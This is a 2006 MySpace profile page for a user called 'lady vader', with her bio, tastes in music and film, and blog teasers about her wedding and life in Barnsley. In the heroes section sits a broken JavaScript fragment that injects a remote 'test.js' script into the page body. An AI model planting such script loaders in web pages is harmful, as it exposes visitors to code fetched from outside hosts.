lady vader,in association with little my profile picture

lady vader,in association with little my

if loving darth is wrong i don't wanna be right

About Me

Layout Provided By - Browse Layoutsabout me about me about me, i'm lesley,i'm married to mellon,i have three top kids,and i love darth, anything else you need to know then you will have to ask. IF YOU WANT ME TO ADD YOU SEND ME A MESSAGE OR I WILL JUST IGNORE YOU, COS I'M LIKE THAT.......

My Interests

i have lots of interests,it's just that i need people to remind me what they are mostly. i've just been informed being a bitch is my biggest interest,apparently. but i'm a big lover of animals,and think that people that are cruel to them should be shot. i also like to eat,that is a big interest of mine. but on a more serious note,international politic's is a big passion of mine, but then so is becoming mrs darth vader so there you go.oh and i like getting married a friend has just reminded me :) and mellon,he is my biggest interest at the moment,and my kids they always interest me cos they are nutts :) starwars

Add to My Profile | More Videos LESLEYS FAVORITE THINGS 1)favorite colour? blue 2)favorite animal? butterflies 3)favorite day? sunday 4)favorite car? my beema 5)favorite food? pinnapple and ginger chicken 6)favorite drink? cranberry tea 7)favorite item of clothing? floppy sleaved cardigan 8)favorite film? starwars of course 9)favorite place? centre parcs 10)favorite passtime? mellon 11)favorite eye colour? brown 12)favorite hair colour? dark or none at all 13)favorite pet?mi puppies (all 5) 14)favorite sweets? butterskoch chews 15)favorite waste of time? my space ......

I'd like to meet:

i'd like to meet fidel castro cos he rocks, and george bush so i could spit in his eye.there is loads of folk i wouldn't mind meeting just for shits and you,i would like to meet you :) ......
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still stuck in the 80s and early 90s. but like anything from early nin to simple plan.rammstein completely rock i think they are ace,been to see them a few times,and they are the best live band i have ever seen, although i have got to say wednesday 13 were pretty dam cool too,i like a bit of old school punk and scar,but don't live my life around it,and i'm listening to disturded a lot at the mo, but have also been known to indulge in james blunt and dido when it's pmt week, but cure are my ultimate feel good mood bands:-when i'm in a- angry mood : rammstein or disturbed sad mood : bowie or goo goo dolls happy mood : cure or less than jake horny mood : NIN or more NIN and rammstein accompanied by the vid.Message from Vader

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god anything wi kung fu in it.big jet lee fan. starwars always makes the list, with empire strikes back getting the star prize. and my new found love is anything with football violence :} green street,footballfactory and the firm are 3 of the best films ever.just got film 4 and it's ace lots of london based brit films.......


i only watch films really not much time for tv, except desperate house wives cos it is funny as fuck, but mostly like to watch a film snuggled wi mi honey. The Empire

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che & fidel for making cuba ace and sticking to the western money whores. Darth vader cos i want to cover him in cling film.and my mum cos she is an angel..."var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /

My Blog


INNER MOST DESIRE?vader wrapped in cling film, or mellon dressed as vader wrapped in cling film i'm easy.WHAT HAVE YOU GO PEIRCED?yep a couple not as many as i used to have,got bored i guess.WHAT TATT...
Posted by lady vader on Fri, 17 Nov 2006 02:30:00 PST

Saddam Hussain

ok i know what you are all gunna say "he's a cunt and deserves to die". but i'm sorry i just can't agree with the sentence that has been handed down to him.There is no denying that the guy is an utter...
Posted by lady vader on Mon, 06 Nov 2006 04:02:00 PST

absense makes the heart grow fonder

i might be going away to work at a punk fest in a couple of weeks, on my friends stall. it's gunna be weird cos i'll be away.....on my mellon. i've never been away from my husban...
Posted by lady vader on Sun, 05 Nov 2006 06:38:00 PST

happy happy happy

i really don't think i could be more happy at the moment. i got smacked in the face 5 days before my wedding,so had a black eye,i really need to find a job cos we are getting quite skint again, i've h...
Posted by lady vader on Fri, 20 Oct 2006 03:37:00 PST

because surveys are shit me and brett wasted a lot of our time doing this one :)

we would very much love it if folks would fill this in and send it back to us, or re-post, or just ignore it thinking bollacks to that 1. What's the one thing guarantied to make you horny? mellon 2. W...
Posted by lady vader on Wed, 18 Oct 2006 02:53:00 PST

married to mellon lol

yes we actually did it, we are married and i am now offically mrs mellon lol, and so far it's feeling pretty good.
Posted by lady vader on Mon, 09 Oct 2006 08:55:00 PST

the funniest things

well i'm thinking that by the amount of blog veiws i've had over the last 2 days that i'm expected to say something,so not being one to dissapoint hear goes. i get married in 3 days woo hoo, i can't f...
Posted by lady vader on Tue, 03 Oct 2006 01:37:00 PST


it's offical i want out! i hate barnsley, i hate everything about it, and i just want out. don't know what has made me think this at this moment in time, maybe it's the going stir crazyness of being h...
Posted by lady vader on Sat, 23 Sep 2006 01:43:00 PST

have you read this?

well you have just waisted 5 minutes of your life then haven't you lol
Posted by lady vader on Wed, 20 Sep 2006 06:50:00 PST

bed hoping

what is wrong wi barnsley? why do people act like they all get put into a bag shuck up and thrown out it 2's a couple of times a week. i tell ya if just one got an STD the whole of barnsleys rock comu...
Posted by lady vader on Wed, 13 Sep 2006 10:19:00 PST